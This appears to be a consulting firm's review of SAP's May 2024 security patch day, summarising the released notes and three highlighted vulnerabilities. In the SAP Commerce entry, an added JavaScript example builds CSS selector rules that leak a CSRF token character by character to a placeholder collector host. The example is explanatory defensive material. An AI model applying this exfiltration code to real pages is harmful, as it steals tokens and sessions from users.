Overview

SAP’s security patch day for May 2024 has seen the release of 15 OSS SAP security notes. Two notes have been classified as critical, one as high, nine as medium, and two as low, based on their CVSS v3.0 base score.

[Figure: Security notes by CVSS v3 base score, May 2024]

Three notes have been released for:

  • SAP S/4HANA
  • SAP NetWeaver AS ABAP

Two notes have been released for:

  • SAP BusinessObjects
  • SAP NetWeaver AS JAVA

Single notes have been released for:

  • SAP Commerce
  • SAP My Travel Requests
  • SAPUI5
  • SAP Replication Server
  • SAP Global Label Management

[Figure: Security notes by product category, May 2024]

Vulnerabilities: May 2024 Highlights

[CVE-2019-17495] Multiple vulnerabilities in SAP CX Commerce (SAP Note 3455438)

SAP Commerce ships the Swagger UI component, and the bundled version is vulnerable to CSS injection. An attacker can use a Relative Path Overwrite (RPO) technique, crafting a URL so that the page’s relative stylesheet reference resolves to attacker-influenced content, which the browser then parses as CSS. The injected CSS can read input field values, such as a CSRF token, out of the page and send them to an attacker-controlled host. SAP rates the note as posing a high risk to the confidentiality, integrity, and availability of the application.
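
The exfiltration step above is easy to misread as a cosmetic issue, so here is the generic mechanism behind CSS-based input field value exfiltration, as an added illustration that is not code from SAP, Swagger UI or the original article. It assumes the sensitive value is rendered into an input’s `value` attribute (the hidden-field CSRF token case), a hex alphabet, and a hypothetical collector host `https://collector.invalid`; the input name `csrf_token` and token value are constructed for the example. Attribute selectors of the form `input[value^="prefix"]` fire a background-image request only when the value starts with that prefix, so each injected stylesheet leaks one more character; the “browser” side is simulated by matching the rules against a constructed value.

```javascript
// Added illustration of CSS attribute-selector exfiltration, the class of
// CSS injection described for CVE-2019-17495. Not SAP or Swagger UI code.
// Constructed assumptions: hex token alphabet, input name, collector host.
const ALPHABET = "0123456789abcdef";

// One round of rules: the rule for `knownPrefix + c` matches only if the
// input's value attribute starts with that string, so the browser requests
// a URL that encodes the newly learned character.
function buildExfilCss(inputName, knownPrefix, collector) {
  return Array.from(ALPHABET, (c) => {
    const prefix = knownPrefix + c;
    return `input[name="${inputName}"][value^="${prefix}"]` +
      `{background:url(${collector}/${encodeURIComponent(prefix)})}`;
  }).join("\n");
}

// Simulates the browser's selector matching: returns the URLs a browser would
// request for a page containing <input name=inputName value=fieldValue>.
function leakedRequests(css, inputName, fieldValue) {
  const rule =
    /input\[name="([^"]+)"\]\[value\^="([^"]+)"\]\{background:url\(([^)]+)\)\}/g;
  const urls = [];
  for (const m of css.matchAll(rule)) {
    const [, name, prefix, url] = m;
    if (name === inputName && fieldValue.startsWith(prefix)) urls.push(url);
  }
  return urls;
}

// Drives the attack to completion, one character per injected stylesheet.
// Stops early (returning the partial prefix) if no rule matches, i.e. the
// value contains a character outside the assumed alphabet.
function recoverToken(inputName, fieldValue, collector) {
  let known = "";
  while (known.length < fieldValue.length) {
    const css = buildExfilCss(inputName, known, collector);
    const hits = leakedRequests(css, inputName, fieldValue);
    if (hits.length !== 1) break;
    known = decodeURIComponent(hits[0].slice(collector.length + 1));
  }
  return known;
}

// Example run with a constructed 4-character hex token.
console.log(recoverToken("csrf_token", "a3f9", "https://collector.invalid"));
```

Two practical points follow from the code: the leak works entirely without script execution, so a Content-Security-Policy that blocks inline scripts does nothing against it unless `style-src` and `img-src` are also restricted, and it only sees what is in the HTML attribute, which is exactly how server-rendered CSRF tokens and session identifiers in hidden fields are exposed.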

The same note also covers a vulnerability in the Apache Calcite Avatica component used by SAP Commerce. It can lead to remote code execution and is likewise rated as a high risk to the confidentiality, integrity, and availability of the application.

[CVE-2024-33006] File upload vulnerability in SAP NetWeaver Application Server ABAP and ABAP Platform (SAP Note 3448171)

An unauthenticated attacker can upload a malicious file to the server, which, when accessed by a victim, allows the attacker to compromise the system completely.

[CVE-2024-28165] Cross site scripting vulnerability in SAP BusinessObjects Business Intelligence Platform (SAP Note 3431794)

SAP BusinessObjects Business Intelligence Platform is vulnerable to stored cross-site scripting. An attacker can manipulate a parameter in the OpenDocument URL so that injected script is stored and later executed in a victim’s browser, which could significantly impact the application’s confidentiality and integrity.

About this Review

On the second Tuesday of each month, SAP releases security updates for its software products. At Absoft, we analyse all of the released security updates and produce this security review, including sending bespoke recommendations to each of our managed service customers.

There is more information on how we handle SAP security updates, including information on SAP’s process, the CVE process and the CVSS base scores in our earlier article on addressing security vulnerabilities in SAP software.
